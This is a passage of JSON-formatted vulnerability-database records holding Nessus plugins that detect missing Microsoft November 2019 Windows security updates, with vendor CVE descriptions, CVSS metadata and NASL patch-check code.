successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2019-1390)\n\n - An information disclosure vulnerability exists in\n Windows Adobe Type Manager Font Driver (ATMFD.dll) when\n it fails to properly handle objects in memory. An\n attacker who successfully exploited this vulnerability\n could potentially read data that was not intended to be\n disclosed. Note that this vulnerability would not allow\n an attacker to execute code or to elevate their user\n rights directly, but it could be used to obtain\n information that could be used to try to further\n compromise the affected system. (CVE-2019-1412)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2019-1439)\n\n - A remote code execution vulnerability exists when the\n Windows Jet Database Engine improperly handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on a victim\n system. An attacker could exploit this vulnerability by\n enticing a victim to open a specially crafted file. The\n update addresses the vulnerability by correcting the way\n the Windows Jet Database Engine handles objects in\n memory. (CVE-2019-1406)\n\n - An elevation of privilege vulnerability exists when the\n Windows Universal Plug and Play (UPnP) service\n improperly allows COM object creation. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code with elevated system privileges. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. (CVE-2019-1405)\n\n - A remote code execution vulnerability exists in\n Microsoft Windows when the Windows Adobe Type Manager\n Library improperly handles specially crafted OpenType\n fonts. For all systems except Windows 10, an attacker\n who successfully exploited the vulnerability could\n execute code remotely. For systems running Windows 10,\n an attacker who successfully exploited the vulnerability\n could execute code in an AppContainer sandbox context\n with limited privileges and capabilities. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n There are multiple ways an attacker could exploit the\n vulnerability, such as by either convincing a user to\n open a specially crafted document, or by convincing a\n user to visit a webpage that contains specially crafted\n embedded OpenType fonts. The update addresses the\n vulnerability by correcting how the Windows Adobe Type\n Manager Library handles OpenType fonts. (CVE-2019-1419,\n CVE-2019-1456)\n\n - A denial of service vulnerability exists when Microsoft\n Hyper-V on a host server fails to properly validate\n input from a privileged user on a guest operating\n system. (CVE-2019-1399)\n\n - A remote code execution vulnerability exists when the\n Windows font library improperly handles specially\n crafted embedded fonts. An attacker who successfully\n exploited this vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2019-1441)\n\n - An information disclosure vulnerability exists when the\n Windows Remote Procedure Call (RPC) runtime improperly\n initializes objects in memory. An attacker who\n successfully exploited this vulnerability could obtain\n information to further compromise the users system.\n (CVE-2019-1409)\n\n - An elevation of privilege vulnerability exists in the\n way that the iphlpsvc.dll handles file creation allowing\n for a file overwrite. An attacker who successfully\n exploited the vulnerability could execute code with\n elevated permissions. (CVE-2019-1422)\");\n # https://support.microsoft.com/en-us/help/4525235/windows-7-update-kb4525235\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?f8b9842b\");\n # https://support.microsoft.com/en-us/help/4525233/windows-7-update-kb4525233\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?8d32296c\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB4525233 or Cumulative Update KB4525235.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-1441\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Microsoft UPnP Local Privilege Elevation Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/11/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/11/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/11/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS19-11\";\nkbs = make_list('4525235', '4525233');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win7:'1') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"6.1\",\n sp:1,\n rollup_date:\"11_2019\",\n bulletin:bulletin,\n rollup_kb_list:[4525235, 4525233])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-08-01T04:58:11", "bulletinFamily": "scanner", "description": "The remote Windows host is missing security update 4525237.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A security feature bypass vulnerability exists when\n Windows Netlogon improperly handles a secure\n communications channel. An attacker who successfully\n exploited the vulnerability could downgrade aspects of\n the connection allowing for further modification of the\n transmission. (CVE-2019-1424)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2019-11135)\n\n - An information disclosure vulnerability exists in the\n way Windows Error Reporting (WER) handles objects in\n memory. An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2019-1374)\n\n - A local elevation of privilege vulnerability exists in\n how splwow64.exe handles certain calls. An attacker who\n successfully exploited the vulnerability could elevate\n privileges on an affected system from low-integrity to\n medium-integrity. This vulnerability by itself does not\n allow arbitrary code execution; however, it could allow\n arbitrary code to be run if the attacker uses it in\n combination with another vulnerability (such as a remote\n code execution vulnerability or another elevation of\n privilege vulnerability) that is capable of leveraging\n the elevated privileges when code execution is\n attempted. The security update addresses the\n vulnerability by ensuring splwow64.exe properly handles\n these calls.. (CVE-2019-1380)\n\n - An elevation of privilege vulnerability exists due to a\n race condition in Windows Subsystem for Linux. An\n attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2019-1416)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Internet Explorer. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2019-1429)\n\n - A security feature bypass vulnerability exists where a\n NETLOGON message is able to obtain the session key and\n sign messages. (CVE-2019-1384)\n\n - An elevation of privilege vulnerability exists when the\n Windows Graphics Component improperly handles objects in\n memory. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. (CVE-2019-1407, CVE-2019-1433, CVE-2019-1435,\n CVE-2019-1438)\n\n - An information vulnerability exists when Windows Modules\n Installer Service improperly discloses file information.\n Successful exploitation of the vulnerability could allow\n the attacker to read the contents of a log file on disk.\n (CVE-2019-1418)\n\n - An elevation of privilege vulnerability exists when the\n Windows User Profile Service (ProfSvc) improperly\n handles symlinks. An attacker who successfully exploited\n this vulnerability could delete files and folders in an\n elevated context. (CVE-2019-1454)\n\n - An elevation of privilege vulnerability exists in the\n Windows Certificate Dialog when it does not properly\n enforce user privileges. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. An attacker could then install\n programs; view, change or delete data. (CVE-2019-1388)\n\n - An information disclosure vulnerability exists when the\n Windows TCP/IP stack improperly handles IPv6 flowlabel\n filled in packets. An attacker who successfully\n exploited this vulnerability could obtain information to\n further compromise the users system. (CVE-2019-1324)\n\n - A denial of service vulnerability exists when Windows\n improperly handles objects in memory. An attacker who\n successfully exploited the vulnerability could cause a\n target system to stop responding. (CVE-2018-12207,\n CVE-2019-1391)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2019-1393, CVE-2019-1394,\n CVE-2019-1395, CVE-2019-1396, CVE-2019-1408)\n\n - An elevation of privilege vulnerability exists in\n Windows Installer because of the way Windows Installer\n handles certain filesystem operations. (CVE-2019-1415)\n\n - A remote code execution vulnerability exists when\n Windows Hyper-V Network Switch on a host server fails to\n properly validate input from an authenticated user on a\n guest operating system. (CVE-2019-0719, CVE-2019-0721)\n\n - An information disclosure vulnerability exists when\n DirectWrite improperly discloses the contents of its\n memory. An attacker who successfully exploited the\n vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how DirectWrite handles objects in memory.\n (CVE-2019-1411)\n\n - An information disclosure vulnerability exists when the\n Windows Servicing Stack allows access to unprivileged\n file locations. An attacker who successfully exploited\n the vulnerability could potentially access unauthorized\n files. (CVE-2019-1381)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2019-1390)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2019-1439)\n\n - A remote code execution vulnerability exists when the\n Windows Jet Database Engine improperly handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on a victim\n system. An attacker could exploit this vulnerability by\n enticing a victim to open a specially crafted file. The\n update addresses the vulnerability by correcting the way\n the Windows Jet Database Engine handles objects in\n memory. (CVE-2019-1406)\n\n - An elevation of privilege vulnerability exists when the\n Windows Universal Plug and Play (UPnP) service\n improperly allows COM object creation. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code with elevated system privileges. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. (CVE-2019-1405)\n\n - A remote code execution vulnerability exists when\n Windows Hyper-V on a host server fails to properly\n validate input from an authenticated user on a guest\n operating system. (CVE-2019-1389, CVE-2019-1397,\n CVE-2019-1398)\n\n - A denial of service vulnerability exists when Microsoft\n Hyper-V Network Switch on a host server fails to\n properly validate input from a privileged user on a\n guest operating system. An attacker who successfully\n exploited the vulnerability could cause the host server\n to crash. (CVE-2019-0712, CVE-2019-1309, CVE-2019-1310)\n\n - A remote code execution vulnerability exists in\n Microsoft Windows when the Windows Adobe Type Manager\n Library improperly handles specially crafted OpenType\n fonts. For all systems except Windows 10, an attacker\n who successfully exploited the vulnerability could\n execute code remotely. For systems running Windows 10,\n an attacker who successfully exploited the vulnerability\n could execute code in an AppContainer sandbox context\n with limited privileges and capabilities. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n There are multiple ways an attacker could exploit the\n vulnerability, such as by either convincing a user to\n open a specially crafted document, or by convincing a\n user to visit a webpage that contains specially crafted\n embedded OpenType fonts. The update addresses the\n vulnerability by correcting how the Windows Adobe Type\n Manager Library handles OpenType fonts. (CVE-2019-1419,\n CVE-2019-1456)\n\n - A denial of service vulnerability exists when Microsoft\n Hyper-V on a host server fails to properly validate\n input from a privileged user on a guest operating\n system. (CVE-2019-1399)\n\n - An elevation of privilege vulnerability exists when the\n Windows Data Sharing Service improperly handles file\n operations. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. An attacker could exploit this vulnerability by\n running a specially crafted application on the victim\n system. The update addresses the vulnerability by\n correcting the way the Windows Data Sharing Service\n handles file operations. (CVE-2019-1383, CVE-2019-1417)\n\n - An elevation of privilege vulnerability exists when\n ActiveX Installer service may allow access to files\n without proper authentication. An attacker who\n successfully exploited the vulnerability could\n potentially access unauthorized files. (CVE-2019-1382)\n\n - An information disclosure vulnerability exists when the\n Windows Remote Procedure Call (RPC) runtime improperly\n initializes objects in memory. An attacker who\n successfully exploited this vulnerability could obtain\n information to further compromise the users system.\n (CVE-2019-1409)\n\n - An elevation of privilege vulnerability exists in the\n way that the dssvc.dll handles file creation allowing\n for a file overwrite or creation in a secured location.\n An attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2019-1420)\n\n - An information disclosure vulnerability exists when the\n win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2019-1436, CVE-2019-1440)\n\n - An elevation of privilege vulnerability exists in the\n way that the iphlpsvc.dll handles file creation allowing\n for a file overwrite. An attacker who successfully\n exploited the vulnerability could execute code with\n elevated permissions. (CVE-2019-1422)\n\n - An elevation of privilege vulnerability exists when the\n Windows AppX Deployment Extensions improperly performs\n privilege management, resulting in access to system\n files. (CVE-2019-1385)", "modified": "2020-08-02T00:00:00", "id": "SMB_NT_MS19_NOV_4525237.NASL", "href": "https://www.tenable.com/plugins/nessus/130907", "published": "2019-11-12T00:00:00", "title": "KB4525237: Windows 10 Version 1803 November 2019 Security Update", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(130907);\n script_version(\"1.11\");\n script_cvs_date(\"Date: 2020/02/14\");\n\n script_cve_id(\n \"CVE-2018-12207\",\n \"CVE-2019-0712\",\n \"CVE-2019-0719\",\n \"CVE-2019-0721\",\n \"CVE-2019-1309\",\n \"CVE-2019-1310\",\n \"CVE-2019-1324\",\n \"CVE-2019-1374\",\n \"CVE-2019-1380\",\n \"CVE-2019-1381\",\n \"CVE-2019-1382\",\n \"CVE-2019-1383\",\n \"CVE-2019-1384\",\n \"CVE-2019-1385\",\n \"CVE-2019-1388\",\n \"CVE-2019-1389\",\n \"CVE-2019-1390\",\n \"CVE-2019-1391\",\n \"CVE-2019-1393\",\n \"CVE-2019-1394\",\n \"CVE-2019-1395\",\n \"CVE-2019-1396\",\n \"CVE-2019-1397\",\n \"CVE-2019-1398\",\n \"CVE-2019-1399\",\n \"CVE-2019-1405\",\n \"CVE-2019-1406\",\n \"CVE-2019-1407\",\n \"CVE-2019-1408\",\n \"CVE-2019-1409\",\n \"CVE-2019-1411\",\n \"CVE-2019-1413\",\n \"CVE-2019-1415\",\n \"CVE-2019-1416\",\n \"CVE-2019-1417\",\n \"CVE-2019-1418\",\n \"CVE-2019-1419\",\n \"CVE-2019-1420\",\n \"CVE-2019-1422\",\n \"CVE-2019-1424\",\n \"CVE-2019-1426\",\n \"CVE-2019-1427\",\n \"CVE-2019-1428\",\n \"CVE-2019-1429\",\n \"CVE-2019-1433\",\n \"CVE-2019-1435\",\n \"CVE-2019-1436\",\n \"CVE-2019-1438\",\n \"CVE-2019-1439\",\n \"CVE-2019-1440\",\n \"CVE-2019-1454\",\n \"CVE-2019-1456\",\n \"CVE-2019-11135\"\n );\n script_xref(name:\"MSKB\", value:\"4525237\");\n script_xref(name:\"MSFT\", value:\"MS19-4525237\");\n\n script_name(english:\"KB4525237: Windows 10 Version 1803 November 2019 Security Update\");\n script_summary(english:\"Checks for rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4525237.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A security feature bypass vulnerability exists when\n Windows Netlogon improperly handles a secure\n communications channel. An attacker who successfully\n exploited the vulnerability could downgrade aspects of\n the connection allowing for further modification of the\n transmission. (CVE-2019-1424)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2019-11135)\n\n - An information disclosure vulnerability exists in the\n way Windows Error Reporting (WER) handles objects in\n memory. An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2019-1374)\n\n - A local elevation of privilege vulnerability exists in\n how splwow64.exe handles certain calls. An attacker who\n successfully exploited the vulnerability could elevate\n privileges on an affected system from low-integrity to\n medium-integrity. This vulnerability by itself does not\n allow arbitrary code execution; however, it could allow\n arbitrary code to be run if the attacker uses it in\n combination with another vulnerability (such as a remote\n code execution vulnerability or another elevation of\n privilege vulnerability) that is capable of leveraging\n the elevated privileges when code execution is\n attempted. The security update addresses the\n vulnerability by ensuring splwow64.exe properly handles\n these calls.. (CVE-2019-1380)\n\n - An elevation of privilege vulnerability exists due to a\n race condition in Windows Subsystem for Linux. An\n attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2019-1416)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Internet Explorer. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2019-1429)\n\n - A security feature bypass vulnerability exists where a\n NETLOGON message is able to obtain the session key and\n sign messages. (CVE-2019-1384)\n\n - An elevation of privilege vulnerability exists when the\n Windows Graphics Component improperly handles objects in\n memory. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. (CVE-2019-1407, CVE-2019-1433, CVE-2019-1435,\n CVE-2019-1438)\n\n - An information vulnerability exists when Windows Modules\n Installer Service improperly discloses file information.\n Successful exploitation of the vulnerability could allow\n the attacker to read the contents of a log file on disk.\n (CVE-2019-1418)\n\n - An elevation of privilege vulnerability exists when the\n Windows User Profile Service (ProfSvc) improperly\n handles symlinks. An attacker who successfully exploited\n this vulnerability could delete files and folders in an\n elevated context. (CVE-2019-1454)\n\n - An elevation of privilege vulnerability exists in the\n Windows Certificate Dialog when it does not properly\n enforce user privileges. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. An attacker could then install\n programs; view, change or delete data. (CVE-2019-1388)\n\n - An information disclosure vulnerability exists when the\n Windows TCP/IP stack improperly handles IPv6 flowlabel\n filled in packets. An attacker who successfully\n exploited this vulnerability could obtain information to\n further compromise the users system. (CVE-2019-1324)\n\n - A denial of service vulnerability exists when Windows\n improperly handles objects in memory. An attacker who\n successfully exploited the vulnerability could cause a\n target system to stop responding. (CVE-2018-12207,\n CVE-2019-1391)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2019-1393, CVE-2019-1394,\n CVE-2019-1395, CVE-2019-1396, CVE-2019-1408)\n\n - An elevation of privilege vulnerability exists in\n Windows Installer because of the way Windows Installer\n handles certain filesystem operations. (CVE-2019-1415)\n\n - A remote code execution vulnerability exists when\n Windows Hyper-V Network Switch on a host server fails to\n properly validate input from an authenticated user on a\n guest operating system. (CVE-2019-0719, CVE-2019-0721)\n\n - An information disclosure vulnerability exists when\n DirectWrite improperly discloses the contents of its\n memory. An attacker who successfully exploited the\n vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how DirectWrite handles objects in memory.\n (CVE-2019-1411)\n\n - An information disclosure vulnerability exists when the\n Windows Servicing Stack allows access to unprivileged\n file locations. An attacker who successfully exploited\n the vulnerability could potentially access unauthorized\n files. (CVE-2019-1381)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2019-1390)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2019-1439)\n\n - A remote code execution vulnerability exists when the\n Windows Jet Database Engine improperly handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on a victim\n system. An attacker could exploit this vulnerability by\n enticing a victim to open a specially crafted file. The\n update addresses the vulnerability by correcting the way\n the Windows Jet Database Engine handles objects in\n memory. (CVE-2019-1406)\n\n - An elevation of privilege vulnerability exists when the\n Windows Universal Plug and Play (UPnP) service\n improperly allows COM object creation. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code with elevated system privileges. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. (CVE-2019-1405)\n\n - A remote code execution vulnerability exists when\n Windows Hyper-V on a host server fails to properly\n validate input from an authenticated user on a guest\n operating system. (CVE-2019-1389, CVE-2019-1397,\n CVE-2019-1398)\n\n - A denial of service vulnerability exists when Microsoft\n Hyper-V Network Switch on a host server fails to\n properly validate input from a privileged user on a\n guest operating system. An attacker who successfully\n exploited the vulnerability could cause the host server\n to crash. (CVE-2019-0712, CVE-2019-1309, CVE-2019-1310)\n\n - A remote code execution vulnerability exists in\n Microsoft Windows when the Windows Adobe Type Manager\n Library improperly handles specially crafted OpenType\n fonts. For all systems except Windows 10, an attacker\n who successfully exploited the vulnerability could\n execute code remotely. For systems running Windows 10,\n an attacker who successfully exploited the vulnerability\n could execute code in an AppContainer sandbox context\n with limited privileges and capabilities. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n There are multiple ways an attacker could exploit the\n vulnerability, such as by either convincing a user to\n open a specially crafted document, or by convincing a\n user to visit a webpage that contains specially crafted\n embedded OpenType fonts. The update addresses the\n vulnerability by correcting how the Windows Adobe Type\n Manager Library handles OpenType fonts. (CVE-2019-1419,\n CVE-2019-1456)\n\n - A denial of service vulnerability exists when Microsoft\n Hyper-V on a host server fails to properly validate\n input from a privileged user on a guest operating\n system. (CVE-2019-1399)\n\n - An elevation of privilege vulnerability exists when the\n Windows Data Sharing Service improperly handles file\n operations. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. An attacker could exploit this vulnerability by\n running a specially crafted application on the victim\n system. The update addresses the vulnerability by\n correcting the way the Windows Data Sharing Service\n handles file operations. (CVE-2019-1383, CVE-2019-1417)\n\n - An elevation of privilege vulnerability exists when\n ActiveX Installer service may allow access to files\n without proper authentication. An attacker who\n successfully exploited the vulnerability could\n potentially access unauthorized files. (CVE-2019-1382)\n\n - An information disclosure vulnerability exists when the\n Windows Remote Procedure Call (RPC) runtime improperly\n initializes objects in memory. An attacker who\n successfully exploited this vulnerability could obtain\n information to further compromise the users system.\n (CVE-2019-1409)\n\n - An elevation of privilege vulnerability exists in the\n way that the dssvc.dll handles file creation allowing\n for a file overwrite or creation in a secured location.\n An attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2019-1420)\n\n - An information disclosure vulnerability exists when the\n win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2019-1436, CVE-2019-1440)\n\n - An elevation of privilege vulnerability exists in the\n way that the iphlpsvc.dll handles file creation allowing\n for a file overwrite. An attacker who successfully\n exploited the vulnerability could execute code with\n elevated permissions. (CVE-2019-1422)\n\n - An elevation of privilege vulnerability exists when the\n Windows AppX Deployment Extensions improperly performs\n privilege management, resulting in access to system\n files. (CVE-2019-1385)\");\n # https://support.microsoft.com/en-us/help/4525237/windows-10-update-kb4525237\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?2194d569\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB4525237.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-1406\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Microsoft UPnP Local Privilege Elevation Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/11/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/11/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/11/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS19-11\";\nkbs = make_list('4525237');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"17134\",\n rollup_date:\"11_2019\",\n bulletin:bulletin,\n rollup_kb_list:[4525237])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-08-01T04:58:11", "bulletinFamily": "scanner", "description": "The remote Windows host is missing security update 4525250\nor cumulative update 4525243. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A remote code execution vulnerability exists when\n Windows Hyper-V Network Switch on a host server fails\n to properly validate input from an authenticated user\n on a guest operating system. (CVE-2019-0719)\n\n - A remote code execution vulnerability exists when\n Windows Hyper-V on a host server fails to properly\n validate input from an authenticated user on a guest\n operating system. (CVE-2019-1389, CVE-2019-1397)\n\n - A security feature bypass vulnerability exists when\n Windows Netlogon improperly handles a secure\n communications channel. An attacker who successfully\n exploited the vulnerability could downgrade aspects of\n the connection allowing for further modification of the\n transmission. (CVE-2019-1424)\n\n - An information disclosure vulnerability exists when\n DirectWrite improperly discloses the contents of its\n memory. An attacker who successfully exploited the\n vulnerability could obtain information to further\n compromise the users system. There are multiple ways 